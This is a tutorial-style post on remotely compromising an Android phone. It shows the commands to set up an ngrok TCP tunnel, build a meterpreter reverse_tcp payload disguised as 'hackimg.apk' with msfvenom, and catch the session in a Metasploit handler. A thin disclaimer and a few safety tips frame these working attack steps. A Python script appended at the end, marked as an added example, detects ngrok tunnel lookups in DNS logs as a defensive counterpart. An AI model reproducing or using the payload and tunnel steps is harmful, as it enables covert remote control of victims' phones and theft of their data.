Hack Android Using Ngrok Over The Internet!

Hack an Android phone over the internet or a WAN without port forwarding. For this purpose we need to create a tunnel between your phone and the victim phone. To do this we use Ngrok, which provides a TCP tunnel between the two parties.

Devices and Tools:

  • A (non-rooted) Samsung Galaxy J2 Pro with a 16GB microSD card connected to my wireless network.
  • Termux application on my Android phone.
  • Metasploit Framework.
  • A Mi phone, which will act as the victim phone.
  • Ngrok

Disclaimer: This post is for educational purposes only. Do not try this on any individual's phone. I have done all the tests on my own phone.

Getting Started:

1. Install Ngrok in Termux:

The screenshot below is my Ngrok dashboard. It provides a token that acts as the authorization for your TCP tunnel.

Download Link : Ngrok file

After downloading the file, extract it and save it in the internal storage of your Android phone at /sdcard/ngrok/ngrok

Note: Rename the file from ngrok-stable-linux-arm to ngrok.

cp /sdcard/ngrok/ngrok $HOME : Copies the ngrok file to the home directory.

chmod +x ngrok : Makes the file executable.

cd .. : After this command you will see two directories, home and usr.

cp home/ngrok usr/bin : Copies the file from the home directory to the usr directory.

After typing the above commands, type ls and you will see that your ngrok file has been added to the usr directory.

./ngrok authtoken

ngrok tcp 4444

Port forwarding is complete, and now it's time to create a payload.

2. Create a Payload in Metasploit:

cd metasploit-framework
./msfvenom -p android/meterpreter/reverse_tcp LHOST=“Copy from Ngrok’s Session” LPORT=“Copy from Ngrok’s Session” R > /sdcard/hackimg.apk
LHOST= 0.tcp.ngrok.io
LPORT= 12345

I am taking it as an example; you can type the value given near the 0.tcp.ngrok.io.

3. Use Metasploit Framework:

./msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost Localhost
set lport 4444
exploit

Some Useful Commands in Metasploit Exploit Section:

A drawback of this method is that you can't get multiple meterpreter sessions over a single port. For multiple sessions, you have to follow all the steps again with a different port.

How you can protect yourself?

  • Only install apps and software from the Google Play Store.
  • Make sure installs from unknown sources are not enabled.
  • Keep your phone with you at all times.
  • Avoid opening any suspicious links in emails or messages.
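
On the network side, the tunnel described in this post can be spotted by the DNS lookup a device makes for the ngrok TCP endpoint (the 0.tcp.ngrok.io form shown above). The following is an added example, not part of the original post: it scans a DNS query log for such lookups and groups them by client. The log format, timestamps, IP addresses and sample hostnames are constructed for illustration, and the regional form (2.tcp.eu.ngrok.io) goes beyond the single hostname the post shows.

```python
import re
from collections import defaultdict

# ngrok TCP tunnel endpoints: 0.tcp.ngrok.io (the form shown in this post)
# and regional variants such as 2.tcp.eu.ngrok.io.
TCP_TUNNEL = re.compile(r"\d+\.tcp\.(?:[a-z]{2}\.)?ngrok\.io")
NGROK_PARENT = "ngrok.io"

# Constructed sample log. Assumed format: "<timestamp> <client-ip> <qname> <qtype>".
SAMPLE_LOG = """\
2024-01-10T09:14:02Z 192.168.1.23 0.tcp.ngrok.io A
2024-01-10T09:14:05Z 192.168.1.40 www.example.com A
2024-01-10T09:15:11Z 192.168.1.23 0.tcp.ngrok.io. A
2024-01-10T09:16:40Z 192.168.1.57 2.TCP.eu.ngrok.io A
2024-01-10T09:17:03Z 192.168.1.40 notngrok.io A
2024-01-10T09:17:30Z 192.168.1.40 ngrok.io.example.net A
2024-01-10T09:18:12Z 192.168.1.61 abc123.ngrok.io AAAA
malformed line
"""

def classify(qname):
    """Return 'tcp-tunnel', 'ngrok-other' or None for a queried name."""
    name = qname.rstrip(".").lower()  # DNS is case-insensitive; drop the root dot
    if TCP_TUNNEL.fullmatch(name):
        return "tcp-tunnel"
    # Match on a label boundary so "notngrok.io" and
    # "ngrok.io.example.net" are not flagged.
    if name == NGROK_PARENT or name.endswith("." + NGROK_PARENT):
        return "ngrok-other"
    return None

def find_ngrok_lookups(log_text):
    """Group ngrok lookups by client: {client_ip: [(timestamp, name, kind), ...]}."""
    hits = defaultdict(list)
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue  # skip malformed lines instead of failing
        ts, client, qname, _qtype = parts
        kind = classify(qname)
        if kind:
            hits[client].append((ts, qname.rstrip(".").lower(), kind))
    return dict(hits)

if __name__ == "__main__":
    for client, events in sorted(find_ngrok_lookups(SAMPLE_LOG).items()):
        for ts, name, kind in events:
            print(f"{ts} {client} {name} [{kind}]")
```

A "tcp-tunnel" hit from a phone or workstation that has no business reason to use ngrok is worth following up; "ngrok-other" hits are lower priority but show where the service is in use.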

ENJOY!